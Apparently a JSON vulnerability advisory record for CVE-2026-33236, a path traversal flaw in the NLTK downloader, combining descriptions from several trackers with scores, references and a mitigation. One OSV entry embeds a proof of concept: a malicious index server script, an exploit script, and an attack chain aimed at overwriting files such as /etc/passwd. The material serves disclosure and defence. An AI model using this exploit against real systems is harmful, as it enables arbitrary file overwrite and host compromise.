Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```", "title": "github - https://api.github.com/advisories/GHSA-469j-vmhf-r6v7" }, { "category": "description", "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33236" }, { "category": "description", "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33236.json" }, { "category": "description", "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33236" }, { "category": "description", "text": "A flaw was found in NLTK (Natural Language Toolkit), a suite of open-source Python modules for Natural Language Processing. The NLTK downloader does not validate `subdir` and `id` attributes when processing remote XML index files. A remote attacker can exploit this path traversal vulnerability by controlling a malicious XML index server, providing specially crafted values. This can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite on the system where NLTK is used.\nIMPORTANT: This flaw in NLTK allows for arbitrary file and directory creation or overwrite due to a path traversal vulnerability in its downloader. An attacker controlling a malicious XML index server could exploit this by providing specially crafted `subdir` and `id` attributes. Red Hat products utilizing NLTK, such as components within Red Hat Ansible Automation Platform, Lightspeed Core, OpenShift Lightspeed, and Red Hat OpenShift AI, are affected if configured to use untrusted remote XML index servers.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33236.json" }, { "category": "description", "text": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: \n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\n\n \n \n \n\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-469j-vmhf-r6v7.json?alt=media" }, { "category": "other", "text": "0.00043", "title": "EPSS" }, { "category": "other", "text": "4.5", "title": "NCSC Score" }, { "category": "other", "text": "There is product data available from source Certbundde", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5878160", "CSAFPID-1409483", "CSAFPID-1409484", "CSAFPID-1439279", "CSAFPID-1508255", "CSAFPID-1508257", "CSAFPID-1508259", "CSAFPID-1508263", "CSAFPID-2518221", "CSAFPID-2524222", "CSAFPID-2698058", "CSAFPID-2698059", "CSAFPID-2783920", "CSAFPID-2831632", "CSAFPID-2831633", "CSAFPID-2831634", "CSAFPID-2920384", "CSAFPID-2960939", "CSAFPID-3054652", "CSAFPID-3095614", "CSAFPID-3112099", "CSAFPID-4675946", "CSAFPID-5008757", "CSAFPID-5035448", "CSAFPID-5222641", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5276226", "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5826731", "CSAFPID-5834017", "CSAFPID-337467", "CSAFPID-477846", "CSAFPID-477847", "CSAFPID-477848", "CSAFPID-477849", "CSAFPID-477850", "CSAFPID-477851", "CSAFPID-477852", "CSAFPID-477853", "CSAFPID-477854", "CSAFPID-477855", "CSAFPID-477856", "CSAFPID-477857", "CSAFPID-477858", "CSAFPID-477859", "CSAFPID-477860", "CSAFPID-477861", "CSAFPID-477862", "CSAFPID-477863", "CSAFPID-477864", "CSAFPID-477865", "CSAFPID-477866", "CSAFPID-710859", "CSAFPID-710860", "CSAFPID-710861", "CSAFPID-710862", "CSAFPID-710863", "CSAFPID-710864", "CSAFPID-712017", "CSAFPID-712018", "CSAFPID-3249744", "CSAFPID-3249745", "CSAFPID-3249746", "CSAFPID-3249747", "CSAFPID-3249748", "CSAFPID-3249749", "CSAFPID-3249750", "CSAFPID-3249751", "CSAFPID-3249752", "CSAFPID-3249753", "CSAFPID-3249754", "CSAFPID-3249755", "CSAFPID-3249756", "CSAFPID-3249757", "CSAFPID-3249758", "CSAFPID-3249759", "CSAFPID-3249760", "CSAFPID-3249761", "CSAFPID-3249762", "CSAFPID-3249763", "CSAFPID-3249764", "CSAFPID-3249765", "CSAFPID-3249766", "CSAFPID-3249767", "CSAFPID-3249768", "CSAFPID-3249769", "CSAFPID-3249770", "CSAFPID-3249771", "CSAFPID-3249772", "CSAFPID-3249773", "CSAFPID-5667818", "CSAFPID-5667819", "CSAFPID-5667820", "CSAFPID-5667821", "CSAFPID-1189281" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-469j-vmhf-r6v7" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33236" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33236.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-33236" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33236.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-469j-vmhf-r6v7.json?alt=media" }, { "category": "external", "summary": "Source - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0895.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-469j-vmhf-r6v7" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33236" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33236" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0895.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0895" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267668" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267691" } ], "remediations": [ { "category": "mitigation", "details": "To mitigate this issue, ensure that any applications utilizing the NLTK downloader are configured to only interact with trusted XML index servers. Restrict network access for the application using NLTK to prevent connections to untrusted external resources. This operational control reduces the risk of an attacker controlling a malicious server to exploit the path traversal vulnerability. A service restart or reload may be required for network configuration changes to take effect.", "product_ids": [ "CSAFPID-1439279", "CSAFPID-1508255", "CSAFPID-1508257", "CSAFPID-1508259", "CSAFPID-1508263", "CSAFPID-2518221", "CSAFPID-2524222", "CSAFPID-2698058", "CSAFPID-2698059", "CSAFPID-2783920", "CSAFPID-2831632", "CSAFPID-2831633", "CSAFPID-2831634", "CSAFPID-2920384", "CSAFPID-2960939", "CSAFPID-3054652", "CSAFPID-3095614", "CSAFPID-3112099", "CSAFPID-4675946", "CSAFPID-5008757", "CSAFPID-5035448", "CSAFPID-5222641", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5276226", "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5826731", "CSAFPID-5834017" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1189281", "CSAFPID-1409483", "CSAFPID-1409484", "CSAFPID-1439279", "CSAFPID-1508255", "CSAFPID-1508257", "CSAFPID-1508259", "CSAFPID-1508263", "CSAFPID-2518221", "CSAFPID-2524222", "CSAFPID-2698058", "CSAFPID-2698059", "CSAFPID-2783920", "CSAFPID-2831632", "CSAFPID-2831633", "CSAFPID-2831634", "CSAFPID-2920384", "CSAFPID-2960939", "CSAFPID-3054652", "CSAFPID-3095614", "CSAFPID-3112099", "CSAFPID-3249744", "CSAFPID-3249745", "CSAFPID-3249746", "CSAFPID-3249747", "CSAFPID-3249748", "CSAFPID-3249749", "CSAFPID-3249750", "CSAFPID-3249751", "CSAFPID-3249752", "CSAFPID-3249753", "CSAFPID-3249754", "CSAFPID-3249755", "CSAFPID-3249756", "CSAFPID-3249757", "CSAFPID-3249758", "CSAFPID-3249759", "CSAFPID-3249760", "CSAFPID-3249761", "CSAFPID-3249762", "CSAFPID-3249763", "CSAFPID-3249764", "CSAFPID-3249765", "CSAFPID-3249766", "CSAFPID-3249767", "CSAFPID-3249768", "CSAFPID-3249769", "CSAFPID-3249770", "CSAFPID-3249771", "CSAFPID-3249772", "CSAFPID-3249773", "CSAFPID-337467", "CSAFPID-4675946", "CSAFPID-477846", "CSAFPID-477847", "CSAFPID-477848", "CSAFPID-477849", "CSAFPID-477850", "CSAFPID-477851", "CSAFPID-477852", "CSAFPID-477853", "CSAFPID-477854", "CSAFPID-477855", "CSAFPID-477856", "CSAFPID-477857", "CSAFPID-477858", "CSAFPID-477859", "CSAFPID-477860", "CSAFPID-477861", "CSAFPID-477862", "CSAFPID-477863", "CSAFPID-477864", "CSAFPID-477865", "CSAFPID-477866", "CSAFPID-5008757", "CSAFPID-5035448", "CSAFPID-5222641", "CSAFPID-5222767", "CSAFPID-5222780", "CSAFPID-5276226", "CSAFPID-5474797", "CSAFPID-5474798", "CSAFPID-5667818", "CSAFPID-5667819", "CSAFPID-5667820", "CSAFPID-5667821", "CSAFPID-5826731", "CSAFPID-5834017", "CSAFPID-5878160", "CSAFPID-710859", "CSAFPID-710860", "CSAFPID-710861", "CSAFPID-710862", "CSAFPID-710863", "CSAFPID-710864", "CSAFPID-712017", "CSAFPID-712018" ] } ], "title": "CVE-2026-33236" } ] }